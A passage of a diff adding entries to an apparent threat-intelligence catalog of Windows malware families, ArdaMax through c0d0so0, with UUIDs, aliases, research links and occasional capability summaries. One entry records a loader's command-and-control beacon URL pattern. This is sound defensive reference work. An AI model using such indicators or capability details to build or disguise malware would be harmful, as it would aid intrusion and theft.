"https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax" + ] + }, + "uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5", + "value": "ArdaMax", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty", + "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" + ] + }, + "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", + "value": "Arefty", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Aaron Keylogger" + ], + "type": [], + 
"refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger", + "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/", + "http://remote-keylogger.net/" + ] + }, + "uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06", + "value": "Arik Keylogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader", + "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", + "https://twitter.com/Racco42/status/1001374490339790849", + "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" + ] + }, + "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", + "value": "ARS VBS Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader" + ] + }, + "uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13", + "value": "AscentLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc" + ] + }, + "uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27", + "value": "ASPC", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Aseljo", + "BadSrc" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox", + "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/", + "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/" + ] + }, + "uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00", + "value": "Asprox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago", + "http://blog.talosintel.com/2017/02/athena-go.html" + ] + }, + "uuid": "587eff78-47be-4022-a1b5-7857340a9ab2", + "value": "AthenaGo RAT", + "description": "" + }, + { + "meta": { + 
"synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + ] + }, + "uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573", + "value": "ATI-Agent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii", + "https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/" + ] + }, + "uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6", + "value": "ATMii", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", + "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/" + ] + }, + "uuid": "5f427b3a-7162-4421-b2cd-e6588d518448", + "value": "ATMitch", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere", + "https://www.group-ib.com/resources/threat-research/silence.html" + ] + }, + "uuid": "15918921-93b8-4b3a-a612-e1d1f769c420", + "value": "Atmosphere", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", + "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", + "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" + ] + }, + "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", + "value": "ATMSpitter", + "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.august_stealer", + "https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html", + "https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene" + ] + }, + "uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78", + "value": "August Stealer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Riodrv" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "e3065e43-503b-4496-921b-7601dd3d6abd", + "value": "Auriga", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", + "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/" + ] + }, + "uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d", + "value": "Aurora", + "description": "Ransomware" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler", + "https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/" + ] + }, + "uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7", + "value": "AvastDisabler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt", + "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" + ] + }, + "uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e", + "value": "AVCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo", + 
"http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" + ] + }, + "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", + "value": "Aveo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan", + "https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/" + ] + }, + "uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3", + "value": "Avzhan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent" + ] + }, + "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70", + "value": "Ayegent", + "description": "" + }, + { + "meta": { + "synonyms": [ + "PuffStealer", + "Rultazo" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", + "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", + "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", + "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", + "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", + "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", + "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ] + }, + "uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c", + "value": "Azorult", + "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. 
It has been observed in conjunction with Chthonic as well as being dropped by Ramnit." + }, + { + "meta": { + "synonyms": [ + "SNOWBALL" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", + "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", + "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", + "http://www.spiegel.de/media/media-35683.pdf", + "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/" + ] + }, + "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", + "value": "Babar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", + "value": "BABYMETAL", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ] + }, + "uuid": "23398248-a52a-4a7c-af10-262822d33a4e", + "value": "backspace", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap", + "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/", + "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", + "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/", + "https://www.cert.pl/en/news/single/backswap-malware-analysis/" + ] + }, + "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", + "value": "BackSwap", + 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript", + "https://twitter.com/PhysicalDrive0/status/833067081981710336" + ] + }, + "uuid": "af1c99be-e55a-473e-abed-726191e1da05", + "value": "BadEncript", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763", + "value": "badflick", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews", + "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", + "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", + "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/" + ] + }, + "uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1", + "value": "BadNews", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle" + ] + }, + "uuid": "f09af1cc-cf9d-499a-9026-e783a3897508", + "value": "Bagle", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut", + "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", + 
"https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" + ] + }, + "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", + "value": "Bahamut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix", + "https://www.cert.pl/en/news/single/banatrix-an-indepth-look/" + ] + }, + "uuid": "721fe429-f240-4fd6-a5c9-187195624b51", + "value": "Banatrix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat", + "https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal" + ] + }, + "uuid": "5c3c53ff-c81f-4daa-9b60-672650046ed7", + "value": "bangat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "MultiBanker 2", + "BankPatch", + "BackPatcher" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori", + "http://blog.kleissner.org/?p=69", + "http://osint.bambenekconsulting.com/feeds/", + "http://blog.kleissner.org/?p=192", + "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/" + ] + }, + "uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324", + "value": "Banjori", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", + "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" + ] + }, + "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", + "value": "Bankshot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart" + ] + }, + "uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123", + "value": "Bart", + "description": "" + }, + { + "meta": { + 
"synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper", + "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html" + ] + }, + "uuid": "b74747e0-59ac-4adf-baac-78213a234ff5", + "value": "BatchWiper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel" + ] + }, + "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e", + "value": "Batel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat", + "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" + ] + }, + "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", + "value": "BBSRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep" + ] + }, + "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b", + "value": "Bedep", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + ] + }, + "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", + "value": "beendoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", + "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick" + ] + }, + "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41", + "value": "BernhardPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Neurevt" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot", + 
"https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", + "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", + "http://www.xylibox.com/2015/04/betabot-retrospective.html", + "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", + "https://www.arbornetworks.com/blog/asert/beta-bot-a-code-review/", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", + "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html", + "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39" + ] + }, + "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", + "value": "BetaBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot" + ] + }, + "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899", + "value": "BfBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates", + "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", + "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf", + "https://habrahabr.ru/post/213973/" + ] + }, + "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", + "value": "BillGates", + "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources." 
+ }, + { + "meta": { + "synonyms": [ + "zxdosml" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "f98b4092-5f32-407c-9015-2da787d70c64", + "value": "Biscuit", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran", + "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" + ] + }, + "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", + "value": "Bitsran", + "description": "" + }, + { + "meta": { + "synonyms": [ + "bwin3_bka" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner", + "https://www.evild3ad.com/405/bka-trojaner-ransomware/" + ] + }, + "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", + "value": "BKA Trojaner", + "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", + "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", + "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", + "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/" + ] + }, + "uuid": "82c644ab-550a-4a83-9b35-d545f4719069", + "value": "BlackEnergy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "POSWDS", + "Reedum", + "Kaptoxa" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" + ] + }, + "uuid": "1e62fc1f-daa7-416f-9159-099798bb862c", + "value": "BlackPOS", + "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. 
" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution", + "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/" + ] + }, + "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", + "value": "BlackRevolution", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades", + "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/", + "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", + "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" + ] + }, + "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b", + "value": "BlackShades", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe", + "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" + ] + }, + "uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f", + "value": "Boaxxe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini" + ] + }, + "uuid": "444ca9d1-7128-40fa-9665-654194dfbe0b", + "value": "Bohmini", + "description": "" + }, + { + "meta": { + "synonyms": [ + "KBOT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek", + "https://asert.arbornetworks.com/communications-bolek-trojan/", + "http://www.cert.pl/news/11379" + ] + }, + "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", + "value": "Bolek", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "80487bca-7629-4cb2-bf5b-993d5568b699", + "value": "Bouncer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" + ] + }, + "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", + "value": "Bozok", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", + "https://www.us-cert.gov/ncas/alerts/TA18-149A", + "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", + "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" + ] + }, + "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763", + "value": "Brambul", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + ] + }, + "uuid": "fbed27da-551d-4793-ba7e-128256326909", + "value": "BravoNC", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader", + "https://malpedia.caad.fkie.fraunhofer.de" + ] + }, + "uuid": "a05b8e4b-a686-439f-8094-037fbcda52bd", + "value": "Breakthrough", + "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. 
C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab", + "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html", + "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/" + ] + }, + "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", + "value": "Bredolab", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos", + "https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html" + ] + }, + "uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151", + "value": "BrutPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" + ] + }, + "uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f", + "value": "BS2005", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware", + "https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/" + ] + }, + "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", + "value": "BTCWare", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bugat_alreadydump" + ] + }, + "uuid": "16794655-c0e2-4510-9169-f862df104045", + "value": "Bugat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ratopak" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", + "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/", + "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", + "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", + "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/" + ] + }, + "uuid": "fa278536-8293-4717-86b5-8a03aa11063f", + "value": "Buhtrap", + "description": "" + }, + { + "meta": { + "synonyms": [ + "R2D2", + "0zapftis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner", + "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf", + "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html", + "https://www.f-secure.com/weblog/archives/00002249.html", + "https://www.f-secure.com/weblog/archives/00002249.html" + ] + }, + "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47", + "value": "Bundestrojaner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", + "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", + "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/", + "http://malware-traffic-analysis.net/2017/05/09/index.html", + "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/" + ] + }, + "uuid": "4350b52a-8100-49b5-848d-d4a4029e949d", + "value": "Bunitu", + "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. 
It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72)." + }, + { + "meta": { + "synonyms": [ + "spyvoltar" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat", + "http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html" + ] + }, + "uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311", + "value": "Buterat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus" + ] + }, + "uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93", + "value": "Buzus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" + ] + }, + "uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1", + "value": "BYEBY", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0" + ] + }, + "uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6", + "value": "c0d0so0", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 